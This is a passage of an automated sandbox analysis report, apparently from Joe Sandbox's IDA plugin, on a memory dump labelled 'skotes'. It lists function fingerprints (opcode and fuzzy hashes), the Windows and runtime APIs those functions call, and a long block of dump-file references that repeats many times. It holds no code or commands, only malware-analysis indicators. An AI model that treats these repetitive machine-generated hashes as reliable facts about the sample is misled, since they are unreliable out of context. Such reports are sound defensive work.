                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3aca8a56400d0d9b6085cf2f602b9ddd120ff48a6058094a875459b271ae8c9e
                                        • Instruction ID: 7b6019eb376da5b008450d13914f4329588881e23bce862402ce1fd7fc88a4e7
                                        • Opcode Fuzzy Hash: 3aca8a56400d0d9b6085cf2f602b9ddd120ff48a6058094a875459b271ae8c9e
                                        • Instruction Fuzzy Hash: 2DF131B1E002199FDF14CFA8C9806ADFBB1FF49324F258269E915A7345D731AE41DB90
                                        APIs
                                        • GetSystemTimePreciseAsFileTime.KERNEL32(?,00F7CF52,?,?,?,?,00F7CF87,?,?,?,?,?,?,00F7C4FD,?,00000001), ref: 00F7CC03
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$FilePreciseSystem
                                        • String ID:
                                        • API String ID: 1802150274-0
                                        • Opcode ID: 10d24d3c663baa5cf4718aadb13a54f75032feba26e78077b4c1a02a50bb2909
                                        • Instruction ID: 106e1c9bc3b5966f324a775b221a5e8c08345b42477c96b12cdf804e6668548c
                                        • Opcode Fuzzy Hash: 10d24d3c663baa5cf4718aadb13a54f75032feba26e78077b4c1a02a50bb2909
                                        • Instruction Fuzzy Hash: 36D02233A0203CA38A122B94EC088ADBB488F00B603018116E90C93120CF20ACC07FD2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 0
                                        • API String ID: 0-4108050209
                                        • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                        • Instruction ID: 9c79985708b2ae948dcaf5d8147b9a0b1f6cf06db8b9d1ec7183add01ac67158
                                        • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                        • Instruction Fuzzy Hash: A8519D31E187445AFF3C6A288C957BEB79A9F03398F140519E443F72A2CE169D4FB291
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a288ba9425b1e0675d4c1a4b7c309044fc7210f48c2e8a11584c5becf56d8827
                                        • Instruction ID: 4d3fa24bf5860600d737680634c111ef8f1e321708c036ec1a1996d45a7ec049
                                        • Opcode Fuzzy Hash: a288ba9425b1e0675d4c1a4b7c309044fc7210f48c2e8a11584c5becf56d8827
                                        • Instruction Fuzzy Hash: 5E2260B3F515144BDB0CCB9DDCA27EDB2E3AFD8218B0E803DA40AE3345EA79D9159644
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f64620727645e8ae3ac0c641d72ce13a02f8d48d78186bec92e48b15f6dd68f5
                                        • Instruction ID: afb40c294963408ba1519219428a2e58986f66bd59068a35cb219e489ebe4108
                                        • Opcode Fuzzy Hash: f64620727645e8ae3ac0c641d72ce13a02f8d48d78186bec92e48b15f6dd68f5
                                        • Instruction Fuzzy Hash: 4DB14BB26147048FDB14DF28C886F657BE0FF46364F258658E899CF2A1C335E992DB40
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8cd170ada9df8754091f63840a4eb46313d3365d7520dd99a31f51ed493e4959
                                        • Instruction ID: 09fd3da0a8f13b1dd6a7f45a7fe43780cc08cb2431a20409ab0da52196ed0bf2
                                        • Opcode Fuzzy Hash: 8cd170ada9df8754091f63840a4eb46313d3365d7520dd99a31f51ed493e4959
                                        • Instruction Fuzzy Hash: 24813070E0024A8FEB15DF68D880BEEBBF1FB5A310F140269C850A7752C735A945EBA0
                                        APIs
                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00F624BE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ___std_exception_copy
                                        • String ID:
                                        • API String ID: 2659868963-0
                                        • Opcode ID: 7752e8ae375562d69b3e1451db957f67ffaebae26e01cb3e5cb3eb4e005e6548
                                        • Instruction ID: 045acfc24f9c42b1f2e9bc029b7d7eab3c9ad0528891e64589b18eb76854259f
                                        • Opcode Fuzzy Hash: 7752e8ae375562d69b3e1451db957f67ffaebae26e01cb3e5cb3eb4e005e6548
                                        • Instruction Fuzzy Hash: 3451C072D0160A8BDB19CF59D986BADBBF0FF48324F24C56BD409EB250D734A940EB91
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 66ea8b17706d411ca62cbecafcd2b2b8ca6c16b6d24793f6c8557c51fdb85ca4
                                        • Instruction ID: 6743950c7488b672c836ad91dc94416863dc1b547e456ecba492c9d87f0c6fa7
                                        • Opcode Fuzzy Hash: 66ea8b17706d411ca62cbecafcd2b2b8ca6c16b6d24793f6c8557c51fdb85ca4
                                        • Instruction Fuzzy Hash: 0121A473F2053947770CC47E8C52279B6E1878C541745823AE8A6EA2C1D968D917E2E4
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 65d099422e56989384daca18d1678ef9f5f47c1dfde2ed8b39eae997b49943e1
                                        • Instruction ID: 88ee89fd51e755261e7d6b95655e227fd2de51b416ecabcc4ffc6a639b507a0e
                                        • Opcode Fuzzy Hash: 65d099422e56989384daca18d1678ef9f5f47c1dfde2ed8b39eae997b49943e1
                                        • Instruction Fuzzy Hash: 33118A73F30C255B675C816D8C1727AA6D2DBD825071F533AD826E72C4E994DE13D290
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                        • Instruction ID: 2d1bcbdc920bb8ba78f43a3e32dc7bad5fe0d485785178f7026cbaa16cd68a5f
                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                        • Instruction Fuzzy Hash: A3115EF7A0118143E604863DC8B86BBE795EBC73717AD4379C0414B748CEAAD843B500
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 095d93b28cf319a27fd06cb640141bd9d6a4d03b04591fb51ff621f1a0bf2182
                                        • Instruction ID: b06b0697c8811616af73df16bdec6ceb79aff518e90f55dbd1b1708f88d8355e
                                        • Opcode Fuzzy Hash: 095d93b28cf319a27fd06cb640141bd9d6a4d03b04591fb51ff621f1a0bf2182
                                        • Instruction Fuzzy Hash: BDE0C230542188AFDF2ABF99CD0DE583B2AFF11751F451810FD048A221CB3AED92EA80
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                        • Instruction ID: 209ec4d145332aafed4e36de9a3eaa05138814a71b48bce704450507b1e60fb4
                                        • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                        • Instruction Fuzzy Hash: E0E08C32921228EBCB15DF98D908D8AF3ECEB49B10B650096F901D3150C274DE00D7D0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Mtx_unlock$Cnd_broadcast
                                        • String ID:
                                        • API String ID: 32384418-0
                                        • Opcode ID: 0bfc8092a6776149c93f5a263e78d7925ea41d9eb5fd02292a79930d2624ab61
                                        • Instruction ID: 6670f70d005bbcb21539b56faede868ac45f87f86fd033c7a1ec28b64ba32ee9
                                        • Opcode Fuzzy Hash: 0bfc8092a6776149c93f5a263e78d7925ea41d9eb5fd02292a79930d2624ab61
                                        • Instruction Fuzzy Hash: 81A1D3B1E01605AFDB10DF64CD44B5AB7B8FF15324F14812AE81AD7641EB35EA04EBD2
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _strrchr
                                        • String ID:
                                        • API String ID: 3213747228-0
                                        • Opcode ID: 254d999fa369d06fd7d93151cbf4a8417e2da6d6341328512c40b930a69fa730
                                        • Instruction ID: 6e78fefa70eeb3d9288854bbaa257cd761fb05e251d38e6f17b6eba39a1c161a
                                        • Opcode Fuzzy Hash: 254d999fa369d06fd7d93151cbf4a8417e2da6d6341328512c40b930a69fa730
                                        • Instruction Fuzzy Hash: 0BB11432D042859FEF15DF28C8817AEBFE5EF45350F14416AE855EB242D6389D02EBE0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
